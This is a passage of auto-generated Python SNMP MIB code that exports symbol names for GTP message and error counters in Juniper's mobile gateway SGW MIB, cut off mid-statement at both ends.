jnxMbgSgwPPDelIndTunReqTx=jnxMbgSgwPPDelIndTunReqTx, jnxMbgSgwIfDelIndTunReqRx=jnxMbgSgwIfDelIndTunReqRx, jnxMbgSgwPPGtpV2ICsAcceptPartRx=jnxMbgSgwPPGtpV2ICsAcceptPartRx, jnxMbgSgwPPV2EchoRespTx=jnxMbgSgwPPV2EchoRespTx, jnxMbgSgwPPGtpV2ICsColNWReqTx=jnxMbgSgwPPGtpV2ICsColNWReqTx, jnxMbgSgwGtpV2ICsCondIEMsRx=jnxMbgSgwGtpV2ICsCondIEMsRx, jnxMbgSgwGTPPortErrRx=jnxMbgSgwGTPPortErrRx, jnxMbgSgwIfGtpV2ICsInReFRePrRx=jnxMbgSgwIfGtpV2ICsInReFRePrRx, jnxMbgSgwPPGtpV2ICsPkFltSynErTx=jnxMbgSgwPPGtpV2ICsPkFltSynErTx, jnxMbgSgwIfGtpV2ICsUENotRespRx=jnxMbgSgwIfGtpV2ICsUENotRespRx, jnxMbgSgwDelBrRspRx=jnxMbgSgwDelBrRspRx, jnxMbgSgwIfType=jnxMbgSgwIfType, jnxMbgSgwIfGtpV2ICsServDeniedTx=jnxMbgSgwIfGtpV2ICsServDeniedTx, jnxMbgSgwSuspAckRx=jnxMbgSgwSuspAckRx, jnxMbgSgwPPGtpV2ICsManIEIncorTx=jnxMbgSgwPPGtpV2ICsManIEIncorTx, jnxMbgSgwIfGtpV2ICsISRDeactRx=jnxMbgSgwIfGtpV2ICsISRDeactRx, jnxMbgSgwGtpIfStatsEntry=jnxMbgSgwGtpIfStatsEntry, jnxMbgSgwIfGtpV2ICsServDeniedRx=jnxMbgSgwIfGtpV2ICsServDeniedRx, jnxMbgSgwGtpV2ICsNoResTx=jnxMbgSgwGtpV2ICsNoResTx, jnxMbgSgwPPGtpV2ICsReqAcceptRx=jnxMbgSgwPPGtpV2ICsReqAcceptRx, jnxMbgSgwDelBrCmdTx=jnxMbgSgwDelBrCmdTx, jnxMbgSgwGtpV2ICsNoMemRx=jnxMbgSgwGtpV2ICsNoMemRx, jnxMbgSgwGtpV2ICsUnPgUESusTx=jnxMbgSgwGtpV2ICsUnPgUESusTx, jnxMbgSgwIfDelConnSetRspRx=jnxMbgSgwIfDelConnSetRspRx, jnxMbgSgwIfGtpV2ICsNOTFTUECTXTx=jnxMbgSgwIfGtpV2ICsNOTFTUECTXTx, jnxMbgSgwPPDelIndTunReqRx=jnxMbgSgwPPDelIndTunReqRx, jnxMbgSgwIfGtpV2ICsPTNotSuppTx=jnxMbgSgwIfGtpV2ICsPTNotSuppTx, jnxMbgSgwCrtBrRspRx=jnxMbgSgwCrtBrRspRx, jnxMbgSgwGtpV2ICsInvLenTx=jnxMbgSgwGtpV2ICsInvLenTx, jnxMbgSgwGtpV2ICsNewPTNPrefRx=jnxMbgSgwGtpV2ICsNewPTNPrefRx, jnxMbgSgwGtpV2ICsIMSINotKnRx=jnxMbgSgwGtpV2ICsIMSINotKnRx, jnxMbgSgwIfCreateSessRspRx=jnxMbgSgwIfCreateSessRspRx, jnxMbgSgwIfDelSessRspRx=jnxMbgSgwIfDelSessRspRx, jnxMbgSgwGtpV2ICsEIFRNCEnTx=jnxMbgSgwGtpV2ICsEIFRNCEnTx, jnxMbgSgwIfBrResFlrIndRx=jnxMbgSgwIfBrResFlrIndRx, jnxMbgSgwIfGtpV2ICsColNWReqRx=jnxMbgSgwIfGtpV2ICsColNWReqRx, jnxMbgSgwIfProtocolErrRx=jnxMbgSgwIfProtocolErrRx, jnxMbgSgwGtpV2ICsInvPrTx=jnxMbgSgwGtpV2ICsInvPrTx, jnxMbgSgwGtpNotifications=jnxMbgSgwGtpNotifications, jnxMbgSgwGtpV2ICsPkFltManErrTx=jnxMbgSgwGtpV2ICsPkFltManErrTx, jnxMbgSgwPPGtpV2ICsNewPTNPrefRx=jnxMbgSgwPPGtpV2ICsNewPTNPrefRx, jnxMbgSgwGtpV2ICsRPrNtRspTx=jnxMbgSgwGtpV2ICsRPrNtRspTx, jnxMbgSgwRelAcsBrRespTx=jnxMbgSgwRelAcsBrRespTx, jnxMbgSgwGtpV2ICsAPNResTIncTx=jnxMbgSgwGtpV2ICsAPNResTIncTx, jnxMbgSgwPPGtpV2ICsCondIEMsTx=jnxMbgSgwPPGtpV2ICsCondIEMsTx, jnxMbgSgwUpdConnSetReqTx=jnxMbgSgwUpdConnSetReqTx, jnxMbgSgwPPGtpV2ICsAPNResTIncRx=jnxMbgSgwPPGtpV2ICsAPNResTIncRx, jnxMbgSgwGtpV2ICsServNotSuppTx=jnxMbgSgwGtpV2ICsServNotSuppTx, jnxMbgSgwUpdBrRspRx=jnxMbgSgwUpdBrRspRx, jnxMbgSgwDelIndTunReqTx=jnxMbgSgwDelIndTunReqTx, jnxMbgSgwIfGtpV2ICsNewPTNPrefRx=jnxMbgSgwIfGtpV2ICsNewPTNPrefRx, jnxMbgSgwDelConnSetReqRx=jnxMbgSgwDelConnSetReqRx, jnxMbgSgwGtpV2ICsInvPrRx=jnxMbgSgwGtpV2ICsInvPrRx, jnxMbgSgwIfGtpV1EndMarkerTx=jnxMbgSgwIfGtpV1EndMarkerTx, jnxMbgSgwBrResFlrIndTx=jnxMbgSgwBrResFlrIndTx, jnxMbgSgwIPVerErrRx=jnxMbgSgwIPVerErrRx, jnxMbgSgwIfGtpV1T3RespTmrExpRx=jnxMbgSgwIfGtpV1T3RespTmrExpRx, jnxMbgSgwIfModBrRspTx=jnxMbgSgwIfModBrRspTx, jnxMbgSgwPPGtpV2ICsProtoNtSupTx=jnxMbgSgwPPGtpV2ICsProtoNtSupTx, jnxMbgSgwIfGtpV2ICsInvMsgFmtTx=jnxMbgSgwIfGtpV2ICsInvMsgFmtTx, jnxMbgSgwPPSuspAckTx=jnxMbgSgwPPSuspAckTx, jnxMbgSgwGtpV2ICsNOTFTUECTXRx=jnxMbgSgwGtpV2ICsNOTFTUECTXRx, jnxMbgSgwPPGtpV2ICsOptIEIncorRx=jnxMbgSgwPPGtpV2ICsOptIEIncorRx, jnxMbgSgwUpdConnSetRspRx=jnxMbgSgwUpdConnSetRspRx, jnxMbgSgwGtpV2ICsPTNotSuppRx=jnxMbgSgwGtpV2ICsPTNotSuppRx, jnxMbgSgwPPGtpV2ICsAPNAcsDenRx=jnxMbgSgwPPGtpV2ICsAPNAcsDenRx, jnxMbgSgwPPGtpV2ICsUnexpRptIERx=jnxMbgSgwPPGtpV2ICsUnexpRptIERx, jnxMbgSgwCreateSessRspRx=jnxMbgSgwCreateSessRspRx, jnxMbgSgwIfGtpV1UnSupMsgRx=jnxMbgSgwIfGtpV1UnSupMsgRx, jnxMbgSgwUpdBrReqTx=jnxMbgSgwUpdBrReqTx, jnxMbgSgwPPGtpV2ICsServNotSupRx=jnxMbgSgwPPGtpV2ICsServNotSupRx, jnxMbgSgwIfGtpV2ICsUERefusesRx=jnxMbgSgwIfGtpV2ICsUERefusesRx, jnxMbgSgwPPGtpV2ICsRPrNtRspTx=jnxMbgSgwPPGtpV2ICsRPrNtRspTx, jnxMbgSgwIfGtpV1EchoReqTx=jnxMbgSgwIfGtpV1EchoReqTx, jnxMbgSgwPPGtpV2ICsCmpDetRx=jnxMbgSgwPPGtpV2ICsCmpDetRx, jnxMbgSgwCrIndTunRespRx=jnxMbgSgwCrIndTunRespRx, jnxMbgSgwIfGtpV2ICsOptIEIncorRx=jnxMbgSgwIfGtpV2ICsOptIEIncorRx, jnxMbgSgwPPGtpV2ICsCmpDetTx=jnxMbgSgwPPGtpV2ICsCmpDetTx, jnxMbgSgwGtpAlarmStatCounter=jnxMbgSgwGtpAlarmStatCounter, jnxMbgSgwPPV2EchoReqRx=jnxMbgSgwPPV2EchoReqRx, jnxMbgSgwDlDataAckRx=jnxMbgSgwDlDataAckRx, jnxMbgSgwIfIPVerErrRx=jnxMbgSgwIfIPVerErrRx, jnxMbgSgwPPStopPagingIndRx=jnxMbgSgwPPStopPagingIndRx, jnxMbgSgwGtpV2ICsInvTotLenTx=jnxMbgSgwGtpV2ICsInvTotLenTx, jnxMbgSgwIfModBrReqTx=jnxMbgSgwIfModBrReqTx, jnxMbgSgwGtpV1ProtocolErrRx=jnxMbgSgwGtpV1ProtocolErrRx, jnxMbgSgwGtpV2ICsUENotRespRx=jnxMbgSgwGtpV2ICsUENotRespRx, jnxMbgSgwIfGtpV2ICsManIEIncorRx=jnxMbgSgwIfGtpV2ICsManIEIncorRx, jnxMbgSgwPPGtpV2ICsUnexpRptIETx=jnxMbgSgwPPGtpV2ICsUnexpRptIETx, jnxMbgSgwIfGtpV2ICsPkFltSynErRx=jnxMbgSgwIfGtpV2ICsPkFltSynErRx, jnxMbgSgwPPDlDataNotifRx=jnxMbgSgwPPDlDataNotifRx, jnxMbgSgwGtpV2ICsCondIEMsTx=jnxMbgSgwGtpV2ICsCondIEMsTx, jnxMbgSgwDelIndTunRespTx=jnxMbgSgwDelIndTunRespTx, jnxMbgSgwPPGtpV2ICsDenINRatRx=jnxMbgSgwPPGtpV2ICsDenINRatRx, jnxMbgSgwGtpPeerGwDnNotif=jnxMbgSgwGtpPeerGwDnNotif, jnxMbgSgwGtpV2ICsPkFltManErrRx=jnxMbgSgwGtpV2ICsPkFltManErrRx, jnxMbgSgwV2NumMsgRx=jnxMbgSgwV2NumMsgRx, jnxMbgSgwPPModBrFlrIndTx=jnxMbgSgwPPModBrFlrIndTx, jnxMbgSgwIfUpdConnSetReqRx=jnxMbgSgwIfUpdConnSetReqRx, jnxMbgSgwGtpObjects=jnxMbgSgwGtpObjects, jnxMbgSgwGtpV2ICsSynErTADTx=jnxMbgSgwGtpV2ICsSynErTADTx, jnxMbgSgwIfPacketAllocFail=jnxMbgSgwIfPacketAllocFail, jnxMbgSgwIfCreateSessReqRx=jnxMbgSgwIfCreateSessReqRx, jnxMbgSgwPPCrIndTunReqRx=jnxMbgSgwPPCrIndTunReqRx, jnxMbgSgwCrtBrRspTx=jnxMbgSgwCrtBrRspTx, jnxMbgSgwPPV2NumBytesTx=jnxMbgSgwPPV2NumBytesTx, jnxMbgSgwGtpIfStatsTable=jnxMbgSgwGtpIfStatsTable, jnxMbgSgwGtpV2ICsColNWReqRx=jnxMbgSgwGtpV2ICsColNWReqRx, jnxMbgSgwPPGtpV2ICsUserAUTHFlTx=jnxMbgSgwPPGtpV2ICsUserAUTHFlTx, jnxMbgSgwIfGtpV2ICsEIFRNCEnTx=jnxMbgSgwIfGtpV2ICsEIFRNCEnTx, jnxMbgSgwPPV2EchoReqTx=jnxMbgSgwPPV2EchoReqTx, jnxMbgSgwDlDataNotifRx=jnxMbgSgwDlDataNotifRx, jnxMbgSgwPPGtpV2ICsRPrNtRspRx=jnxMbgSgwPPGtpV2ICsRPrNtRspRx, jnxMbgSgwS11PiggybackMsgRx=jnxMbgSgwS11PiggybackMsgRx, jnxMbgSgwPPGtpV2ICsSysFailRx=jnxMbgSgwPPGtpV2ICsSysFailRx, jnxMbgSgwGtpV2ICsVerNotSuppRx=jnxMbgSgwGtpV2ICsVerNotSuppRx, jnxMbgSgwDlDataAckTx=jnxMbgSgwDlDataAckTx, jnxMbgSgwPPGtpV2ICsCtxNotFndRx=jnxMbgSgwPPGtpV2ICsCtxNotFndRx, jnxMbgSgwIfGtpV2ICsAlDynAdOccTx=jnxMbgSgwIfGtpV2ICsAlDynAdOccTx, jnxMbgSgwPPGtpV1ProtocolErrRx=jnxMbgSgwPPGtpV1ProtocolErrRx, jnxMbgSgwModBrCmdTx=jnxMbgSgwModBrCmdTx, jnxMbgSgwPPProtocolErrRx=jnxMbgSgwPPProtocolErrRx, jnxMbgSgwPPRelAcsBrReqTx=jnxMbgSgwPPRelAcsBrReqTx, jnxMbgSgwGtpV1UnSupMsgRx=jnxMbgSgwGtpV1UnSupMsgRx, jnxMbgSgwResumeAckTx=jnxMbgSgwResumeAckTx, jnxMbgSgwIfGtpV2ICsSysFailTx=jnxMbgSgwIfGtpV2ICsSysFailTx, jnxMbgSgwIfV2EchoReqTx=jnxMbgSgwIfV2EchoReqTx, jnxMbgSgwIfGtpV2ICsRMValRcvRx=jnxMbgSgwIfGtpV2ICsRMValRcvRx, jnxMbgSgwPPUpdBrRspTx=jnxMbgSgwPPUpdBrRspTx, jnxMbgSgwIfGtpV2ICsSynErTADRx=jnxMbgSgwIfGtpV2ICsSynErTADRx, jnxMbgSgwPPSuspAckRx=jnxMbgSgwPPSuspAckRx, jnxMbgSgwProtocolErrRx=jnxMbgSgwProtocolErrRx, jnxMbgSgwCrtBrReqTx=jnxMbgSgwCrtBrReqTx, jnxMbgSgwIfCrtBrReqRx=jnxMbgSgwIfCrtBrReqRx, jnxMbgSgwIfGtpV2ICsProtoNtSupTx=jnxMbgSgwIfGtpV2ICsProtoNtSupTx, jnxMbgSgwIfGtpV2ICsUserAUTHFlRx=jnxMbgSgwIfGtpV2ICsUserAUTHFlRx, jnxMbgSgwGtpV2ICsSemErTADTx=jnxMbgSgwGtpV2ICsSemErTADTx, jnxMbgSgwGtpV2ICsSysFailTx=jnxMbgSgwGtpV2ICsSysFailTx, jnxMbgSgwGtpV2ICsDtForNtSupTx=jnxMbgSgwGtpV2ICsDtForNtSupTx, jnxMbgSgwPPDelBrFlrIndRx=jnxMbgSgwPPDelBrFlrIndRx, jnxMbgSgwPPGtpV2ICsUnPgUESusTx=jnxMbgSgwPPGtpV2ICsUnPgUESusTx, jnxMbgSgwGtpV2ICsManIEMissTx=jnxMbgSgwGtpV2ICsManIEMissTx, jnxMbgSgwCreateSessReqTx=jnxMbgSgwCreateSessReqTx, jnxMbgSgwPPUpdBrReqTx=jnxMbgSgwPPUpdBrReqTx, jnxMbgSgwIfPiggybackMsgTx=jnxMbgSgwIfPiggybackMsgTx, jnxMbgSgwIfResumeAckRx=jnxMbgSgwIfResumeAckRx, jnxMbgSgwPPGtpV2ICsPageRx=jnxMbgSgwPPGtpV2ICsPageRx, jnxMbgSgwIfGtpV2ICsNOTFTUECTXRx=jnxMbgSgwIfGtpV2ICsNOTFTUECTXRx, jnxMbgSgwIfGtpV2ICsInvTotLenRx=jnxMbgSgwIfGtpV2ICsInvTotLenRx, jnxMbgSgwGTPUnknVerRx=jnxMbgSgwGTPUnknVerRx, jnxMbgSgwV2EchoReqTx=jnxMbgSgwV2EchoReqTx, jnxMbgSgwPPGtpV2ICsManIEMissTx=jnxMbgSgwPPGtpV2ICsManIEMissTx, jnxMbgSgwIfGtpV2ICsAPNResTIncRx=jnxMbgSgwIfGtpV2ICsAPNResTIncRx, jnxMbgSgwIfDlDataNotiFlrIndRx=jnxMbgSgwIfDlDataNotiFlrIndRx, jnxMbgSgwPPGtpV2ICsInvTotLenTx=jnxMbgSgwPPGtpV2ICsInvTotLenTx, jnxMbgSgwGtpV2ICsMisUnknAPNRx=jnxMbgSgwGtpV2ICsMisUnknAPNRx, jnxMbgSgwModBrReqRx=jnxMbgSgwModBrReqRx, jnxMbgSgwModBrReqTx=jnxMbgSgwModBrReqTx, jnxMbgSgwIfGtpV2ICsReqRejTx=jnxMbgSgwIfGtpV2ICsReqRejTx, jnxMbgSgwIfRelAcsBrRespTx=jnxMbgSgwIfRelAcsBrRespTx, jnxMbgSgwCrIndTunReqRx=jnxMbgSgwCrIndTunReqRx, jnxMbgSgwIfGtpV2ICsProtoNtSupRx=jnxMbgSgwIfGtpV2ICsProtoNtSupRx, jnxMbgSgwPPDelBrRspRx=jnxMbgSgwPPDelBrRspRx, jnxMbgSgwPPGtpV2ICsLclDetTx=jnxMbgSgwPPGtpV2ICsLclDetTx, jnxMbgSgwIfGtpV2ICsIMSINotKnRx=jnxMbgSgwIfGtpV2ICsIMSINotKnRx, jnxMbgSgwIfRelAcsBrRespRx=jnxMbgSgwIfRelAcsBrRespRx, jnxMbgSgwPPV2VerNotSupTx=jnxMbgSgwPPV2VerNotSupTx, jnxMbgSgwIfGtpV2ICsPTMSISigMMTx=jnxMbgSgwIfGtpV2ICsPTMSISigMMTx, jnxMbgSgwIfGtpV2ICsRATChgRx=jnxMbgSgwIfGtpV2ICsRATChgRx, jnxMbgSgwGtpGwName=jnxMbgSgwGtpGwName, jnxMbgSgwPPGtpV2ICsUnabPageUETx=jnxMbgSgwPPGtpV2ICsUnabPageUETx, jnxMbgSgwGtpV2ICsNewPTSIAdbrTx=jnxMbgSgwGtpV2ICsNewPTSIAdbrTx, jnxMbgSgwSuspNotifRx=jnxMbgSgwSuspNotifRx, jnxMbgSgwPPV2VerNotSupRx=jnxMbgSgwPPV2VerNotSupRx, jnxMbgSgwIfGtpV2ICsNoMemRx=jnxMbgSgwIfGtpV2ICsNoMemRx, jnxMbgSgwDelBrRspTx=jnxMbgSgwDelBrRspTx, jnxMbgSgwIfGtpV2ICsSynErTADTx=jnxMbgSgwIfGtpV2ICsSynErTADTx, jnxMbgSgwIfIPProtoErrRx=jnxMbgSgwIfIPProtoErrRx, jnxMbgSgwIfGtpV1EchoRespRx=jnxMbgSgwIfGtpV1EchoRespRx, jnxMbgSgwPPGtpV2ICsInvLenTx=jnxMbgSgwPPGtpV2ICsInvLenTx, jnxMbgSgwSuspNotifTx=jnxMbgSgwSuspNotifTx, jnxMbgSgwPPGtpV2ICsColNWReqRx=jnxMbgSgwPPGtpV2ICsColNWReqRx, jnxMbgSgwIfGtpV2ICsCtxNotFndTx=jnxMbgSgwIfGtpV2ICsCtxNotFndTx, jnxMbgSgwIfGtpV1ErrIndRx=jnxMbgSgwIfGtpV1ErrIndRx, jnxMbgSgwPPDelConnSetReqTx=jnxMbgSgwPPDelConnSetReqTx, jnxMbgSgwPPGtpV1EchoRespTx=jnxMbgSgwPPGtpV1EchoRespTx, jnxMbgSgwPPGtpV2ICsServDeniedTx=jnxMbgSgwPPGtpV2ICsServDeniedTx, jnxMbgSgwGtpV2ICsUnknownTx=jnxMbgSgwGtpV2ICsUnknownTx, jnxMbgSgwPPDelConnSetReqRx=jnxMbgSgwPPDelConnSetReqRx, jnxMbgSgwIfDelIndTunRespTx=jnxMbgSgwIfDelIndTunRespTx, jnxMbgSgwIfPiggybackMsgRx=jnxMbgSgwIfPiggybackMsgRx, jnxMbgSgwIfDelBrCmdRx=jnxMbgSgwIfDelBrCmdRx, jnxMbgSgwGtpV1EchoRespRx=jnxMbgSgwGtpV1EchoRespRx, jnxMbgSgwPPGtpLclAddr=jnxMbgSgwPPGtpLclAddr, jnxMbgSgwPPGtpV2ICsPkFltSynErRx=jnxMbgSgwPPGtpV2ICsPkFltSynErRx, jnxMbgSgwPPGtpV2ICsRelocFailTx=jnxMbgSgwPPGtpV2ICsRelocFailTx, jnxMbgSgwGtpV2ICsAPNAcsDenRx=jnxMbgSgwGtpV2ICsAPNAcsDenRx, jnxMbgSgwIfGtpV2ICsUnknownTx=jnxMbgSgwIfGtpV2ICsUnknownTx, jnxMbgSgwPPDelSessRspRx=jnxMbgSgwPPDelSessRspRx, jnxMbgSgwPPGtpV2ICsNewPTNPrefTx=jnxMbgSgwPPGtpV2ICsNewPTNPrefTx, jnxMbgSgwV2EchoRespTx=jnxMbgSgwV2EchoRespTx, jnxMbgSgwPPGtpV2ICsVerNotSuppTx=jnxMbgSgwPPGtpV2ICsVerNotSuppTx, jnxMbgSgwResumeNotifTx=jnxMbgSgwResumeNotifTx, jnxMbgSgwPPCrtBrRspTx=jnxMbgSgwPPCrtBrRspTx, jnxMbgSgwPPGtpV2ICsGREKeyNtFdRx=jnxMbgSgwPPGtpV2ICsGREKeyNtFdRx, jnxMbgSgwPPGtpV2ICsManIEIncorRx=jnxMbgSgwPPGtpV2ICsManIEIncorRx, jnxMbgSgwIfDlDataNotifRx=jnxMbgSgwIfDlDataNotifRx, jnxMbgSgwIfDelConnSetReqRx=jnxMbgSgwIfDelConnSetReqRx, jnxMbgSgwGtpV2ICsAPNResTIncRx=jnxMbgSgwGtpV2ICsAPNResTIncRx, jnxMbgSgwIfGtpV1ProtocolErrRx=jnxMbgSgwIfGtpV1ProtocolErrRx, jnxMbgSgwIfUpdBrRspTx=jnxMbgSgwIfUpdBrRspTx, jnxMbgSgwPPGtpV2ICsTFTSysErrRx=jnxMbgSgwPPGtpV2ICsTFTSysErrRx)
mibBuilder.exportSymbols("JUNIPER-MOBILE-GATEWAY-SGW-GTP-MIB", jnxMbgSgwResumeNotifRx=jnxMbgSgwResumeNotifRx, jnxMbgSgwIfV2EchoReqRx=jnxMbgSgwIfV2EchoReqRx, jnxMbgSgwSuspAckTx=jnxMbgSgwSuspAckTx, jnxMbgSgwGtpV1EndMarkerRx=jnxMbgSgwGtpV1EndMarkerRx, jnxMbgSgwIfGtpV2ICsNoMemTx=jnxMbgSgwIfGtpV2ICsNoMemTx, jnxMbgSgwPPGtpV2ICsNPTSIAdbrRx=jnxMbgSgwPPGtpV2ICsNPTSIAdbrRx, jnxMbgSgwPPGtpV1EndMarkerTx=jnxMbgSgwPPGtpV1EndMarkerTx, jnxMbgSgwPPGtpV2ICsReqRejRx=jnxMbgSgwPPGtpV2ICsReqRejRx, jnxMbgSgwIfSuspAckRx=jnxMbgSgwIfSuspAckRx, jnxMbgSgwIfGtpV2ICsNoResRx=jnxMbgSgwIfGtpV2ICsNoResRx, jnxMbgSgwIfGtpV2ICsInvPrTx=jnxMbgSgwIfGtpV2ICsInvPrTx, jnxMbgSgwGtpV2ICsMisUnknAPNTx=jnxMbgSgwGtpV2ICsMisUnknAPNTx, jnxMbgSgwIfGtpV2ICsNPTSIAdbrTx=jnxMbgSgwIfGtpV2ICsNPTSIAdbrTx, jnxMbgSgwPPGtpV2ICsEIFRNCEnRx=jnxMbgSgwPPGtpV2ICsEIFRNCEnRx, jnxMbgSgwUpdConnSetReqRx=jnxMbgSgwUpdConnSetReqRx, jnxMbgSgwGtpV2ICsAllDynAdOccTx=jnxMbgSgwGtpV2ICsAllDynAdOccTx, jnxMbgSgwIfResumeNotifRx=jnxMbgSgwIfResumeNotifRx, jnxMbgSgwGtpV2ICsRATChgTx=jnxMbgSgwGtpV2ICsRATChgTx, jnxMbgSgwGtpV1ErrIndTx=jnxMbgSgwGtpV1ErrIndTx, jnxMbgSgwIfSuspNotifTx=jnxMbgSgwIfSuspNotifTx, jnxMbgSgwIfGtpV2ICsAlDynAdOccRx=jnxMbgSgwIfGtpV2ICsAlDynAdOccRx, jnxMbgSgwIfUnknMsgRx=jnxMbgSgwIfUnknMsgRx, jnxMbgSgwPPDlDataAckRx=jnxMbgSgwPPDlDataAckRx, jnxMbgSgwIfGtpV2ICsNoResTx=jnxMbgSgwIfGtpV2ICsNoResTx, jnxMbgSgwPPGtpV2ICsTFTSMANTErTx=jnxMbgSgwPPGtpV2ICsTFTSMANTErTx, jnxMbgSgwIfGtpV2ICsTFTSMANTErTx=jnxMbgSgwIfGtpV2ICsTFTSMANTErTx, jnxMbgSgwIfV2NumBytesRx=jnxMbgSgwIfV2NumBytesRx, jnxMbgSgwPPPacketSendFail=jnxMbgSgwPPPacketSendFail, jnxMbgSgwModBrRspRx=jnxMbgSgwModBrRspRx, jnxMbgSgwPPCrIndTunReqTx=jnxMbgSgwPPCrIndTunReqTx, jnxMbgSgwRelAcsBrReqRx=jnxMbgSgwRelAcsBrReqRx, jnxMbgSgwPPGtpV2ICsCondIEMsRx=jnxMbgSgwPPGtpV2ICsCondIEMsRx, jnxMbgSgwIfDelBrFlrIndRx=jnxMbgSgwIfDelBrFlrIndRx, jnxMbgSgwV2NumBytesRx=jnxMbgSgwV2NumBytesRx, jnxMbgSgwPPGtpV2ICsUENotRespRx=jnxMbgSgwPPGtpV2ICsUENotRespRx, jnxMbgSgwPPGtpV2ICsDtForNtSupTx=jnxMbgSgwPPGtpV2ICsDtForNtSupTx, jnxMbgSgwGtpNotificationVars=jnxMbgSgwGtpNotificationVars, jnxMbgSgwPPV2EchoRespRx=jnxMbgSgwPPV2EchoRespRx, jnxMbgSgwPPGtpV2ICsTFTSysErrTx=jnxMbgSgwPPGtpV2ICsTFTSysErrTx, jnxMbgSgwGtpV2ICsVerNotSuppTx=jnxMbgSgwGtpV2ICsVerNotSuppTx, jnxMbgSgwIfGtpV1EchoReqRx=jnxMbgSgwIfGtpV1EchoReqRx, jnxMbgSgwIfCreateSessRspTx=jnxMbgSgwIfCreateSessRspTx, jnxMbgSgwGtpPerPeerStatsEntry=jnxMbgSgwGtpPerPeerStatsEntry, jnxMbgSgwPPGtpV2ICsUnknownTx=jnxMbgSgwPPGtpV2ICsUnknownTx, jnxMbgSgwIfGtpV2ICsPTMSISigMMRx=jnxMbgSgwIfGtpV2ICsPTMSISigMMRx, jnxMbgSgwGtpGwIndex=jnxMbgSgwGtpGwIndex, jnxMbgSgwModBrCmdRx=jnxMbgSgwModBrCmdRx, jnxMbgSgwPPDelSessRspTx=jnxMbgSgwPPDelSessRspTx, jnxMbgSgwIfV2NumMsgRx=jnxMbgSgwIfV2NumMsgRx, jnxMbgSgwIfBrResCmdRx=jnxMbgSgwIfBrResCmdRx, jnxMbgSgwPPGtpV2ICsAllDynAdOcTx=jnxMbgSgwPPGtpV2ICsAllDynAdOcTx, jnxMbgSgwIfV2VerNotSupRx=jnxMbgSgwIfV2VerNotSupRx, jnxMbgSgwPPGtpV2ICsPageTx=jnxMbgSgwPPGtpV2ICsPageTx, jnxMbgSgwPPGtpV2ICsSemErTADTx=jnxMbgSgwPPGtpV2ICsSemErTADTx, jnxMbgSgwPPResumeAckRx=jnxMbgSgwPPResumeAckRx, jnxMbgSgwGtpV2ICsPTNotSuppTx=jnxMbgSgwGtpV2ICsPTNotSuppTx, jnxMbgSgwGtpV2ICsSysFailRx=jnxMbgSgwGtpV2ICsSysFailRx, jnxMbgSgwPPUnknMsgRx=jnxMbgSgwPPUnknMsgRx, jnxMbgSgwGtpV2ICsNOTFTUECTXTx=jnxMbgSgwGtpV2ICsNOTFTUECTXTx, jnxMbgSgwPPDelBrReqRx=jnxMbgSgwPPDelBrReqRx, jnxMbgSgwGtpV2ICsManIEMissRx=jnxMbgSgwGtpV2ICsManIEMissRx, jnxMbgSgwDelIndTunReqRx=jnxMbgSgwDelIndTunReqRx, jnxMbgSgwGtpV2ICsReqAcceptRx=jnxMbgSgwGtpV2ICsReqAcceptRx, jnxMbgSgwPPUpdBrRspRx=jnxMbgSgwPPUpdBrRspRx, jnxMbgSgwIfGtpV2ICsMisUnknAPNTx=jnxMbgSgwIfGtpV2ICsMisUnknAPNTx, jnxMbgSgwPPGtpV1ErrIndRx=jnxMbgSgwPPGtpV1ErrIndRx, jnxMbgSgwGtpPeerName=jnxMbgSgwGtpPeerName, jnxMbgSgwDelBrReqTx=jnxMbgSgwDelBrReqTx, jnxMbgSgwIfGtpV2ICsManIEIncorTx=jnxMbgSgwIfGtpV2ICsManIEIncorTx, jnxMbgSgwIfGtpV2ICsSemErTADRx=jnxMbgSgwIfGtpV2ICsSemErTADRx, jnxMbgSgwIfGtpV2ICsDenINRatRx=jnxMbgSgwIfGtpV2ICsDenINRatRx, jnxMbgSgwIfUpdBrRspRx=jnxMbgSgwIfUpdBrRspRx, jnxMbgSgwPPCrtBrReqRx=jnxMbgSgwPPCrtBrReqRx, jnxMbgSgwGtpV2ICsTFTSysErrTx=jnxMbgSgwGtpV2ICsTFTSysErrTx, jnxMbgSgwIfPcktLenErrRx=jnxMbgSgwIfPcktLenErrRx, jnxMbgSgwIfGtpV2ICsRelocFailTx=jnxMbgSgwIfGtpV2ICsRelocFailTx, jnxMbgSgwIfGtpV2ICsReqAcceptTx=jnxMbgSgwIfGtpV2ICsReqAcceptTx, jnxMbgSgwPPPiggybackMsgRx=jnxMbgSgwPPPiggybackMsgRx, jnxMbgSgwDelSessRspTx=jnxMbgSgwDelSessRspTx, jnxMbgSgwPPDelBrReqTx=jnxMbgSgwPPDelBrReqTx, jnxMbgSgwGtpV2ICsTFTSMANTErRx=jnxMbgSgwGtpV2ICsTFTSMANTErRx, jnxMbgSgwPPGtpV2ICsUERefusesTx=jnxMbgSgwPPGtpV2ICsUERefusesTx, jnxMbgSgwGtpV2ICsNoResRx=jnxMbgSgwGtpV2ICsNoResRx, jnxMbgSgwIfDelBrReqRx=jnxMbgSgwIfDelBrReqRx, jnxMbgSgwGtpV2ICsRMValRcvRx=jnxMbgSgwGtpV2ICsRMValRcvRx, jnxMbgSgwGtpV2ICsUnabPageUERx=jnxMbgSgwGtpV2ICsUnabPageUERx, jnxMbgSgwIfGtpV2ICsNewPTNPrefTx=jnxMbgSgwIfGtpV2ICsNewPTNPrefTx, jnxMbgSgwPPBrResCmdTx=jnxMbgSgwPPBrResCmdTx, jnxMbgSgwIfDlDataNotifTx=jnxMbgSgwIfDlDataNotifTx, jnxMbgSgwPacketAllocFail=jnxMbgSgwPacketAllocFail, jnxMbgSgwPPGtpV2ICsSemErTADRx=jnxMbgSgwPPGtpV2ICsSemErTADRx, jnxMbgSgwPPDlDataNotiFlrIndTx=jnxMbgSgwPPDlDataNotiFlrIndTx, jnxMbgSgwIfUpdConnSetRspTx=jnxMbgSgwIfUpdConnSetRspTx, jnxMbgSgwGtpV2ICsIMSINotKnTx=jnxMbgSgwGtpV2ICsIMSINotKnTx, jnxMbgSgwGtpV2ICsSemErTADRx=jnxMbgSgwGtpV2ICsSemErTADRx, jnxMbgSgwPPGtpV2ICsLclDetRx=jnxMbgSgwPPGtpV2ICsLclDetRx, jnxMbgSgwIfUpdConnSetReqTx=jnxMbgSgwIfUpdConnSetReqTx, jnxMbgSgwIfPacketSendFail=jnxMbgSgwIfPacketSendFail, jnxMbgSgwIfGtpV2ICsNPTSIAdbrRx=jnxMbgSgwIfGtpV2ICsNPTSIAdbrRx, jnxMbgSgwIfGtpV2ICsAcceptPartTx=jnxMbgSgwIfGtpV2ICsAcceptPartTx, 